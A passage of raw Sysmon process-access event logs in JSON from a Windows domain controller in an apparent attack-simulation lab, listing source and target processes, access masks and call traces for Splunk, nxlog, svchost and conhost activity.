{E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.502\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1278-5F25-0000-0010285A0900}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.502","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1278-5F25-0000-0010285A0900}","TargetProcessId":"2548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:00.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:00.642\r\nSourceProcessGUID: {E2A3D6B1-1278-5F25-0000-0010285A0900}\r\nSourceProcessId: 2548\r\nSourceThreadId: 5060\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program 